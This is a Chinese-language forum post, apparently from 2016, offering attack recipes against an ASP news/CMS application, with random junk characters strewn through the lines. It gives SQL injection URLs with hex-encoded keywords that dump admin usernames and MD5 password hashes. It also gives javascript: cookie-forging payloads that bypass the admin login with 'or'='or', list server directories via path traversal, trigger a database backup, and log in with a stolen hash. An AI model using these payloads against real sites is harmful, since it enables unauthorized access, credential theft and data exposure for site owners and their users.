一、注入+ r/ `: i# z; B
1、news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
- `+ T( O1 |" W8 t2 A5 }* P$ ]" Q9 b8 E) K8 T# I
2、第一步:javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1");location.href="admin_chk.asp" " t( ]+ j( U/ k) E; E: ~9 i% { y( D
第二步:请求:admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin& X' S) R E' u9 T+ X( \/ N
可得到用户名和MD5加密码的密码。0 |" i/ x% f, M
8 U1 {% _: @- k1 n2 V5 g) t
二、cookies欺骗
* B- A1 y$ q- S" c
& U, Q) R3 b9 J3 N S/ o( Q1、直接进后台,适用于较低版本,一般login.asp和admin_index.asp在同一目录下的版本有此漏洞.
! q9 `* b/ V5 Rjavascript:alert(document.cookie="adminuser="+escape("'or'='or'"));alert(document.cookie="adminpass="+escape("'or'='or'"));alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"# T. I4 o6 b: N9 V
; j u+ y2 g0 w
2、列目录. 5 Y; J% i4 F- K; @$ T2 P
javascript:alert(document.cookie="admindj="+escape("1"));location.href="edit/admin_uploadfile.asp?dir=..", W: a1 s# g6 @/ b3 _( A
' X2 h0 ?. z/ q. e& o" P
3、数据库备份(适用性好像比较低.)
. C) {& O% X$ \- [% q+ q: T4 ~" K$ Ujavascript:alert(document.cookie="admindj="+escape("1"));location.href="admin_db_backup.asp?action=backupdata"4 I& W2 x- g5 ^% ~; C$ ]( h8 [$ n
: T4 t) G' L q3 U- y5 l( Q5 B
4、得到MD5密码解不了密进后台方法
! P/ Y7 M! `9 |1 Fjavascript:alert(document.cookie="adminuser="+escape("用户名")); alert(document.cookie="adminpass="+escape("md5密码")); alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"9 d4 V- ]& z+ L+ `* g$ e
|
发表于 2016-5-11 14:55:08
收藏
支持
反对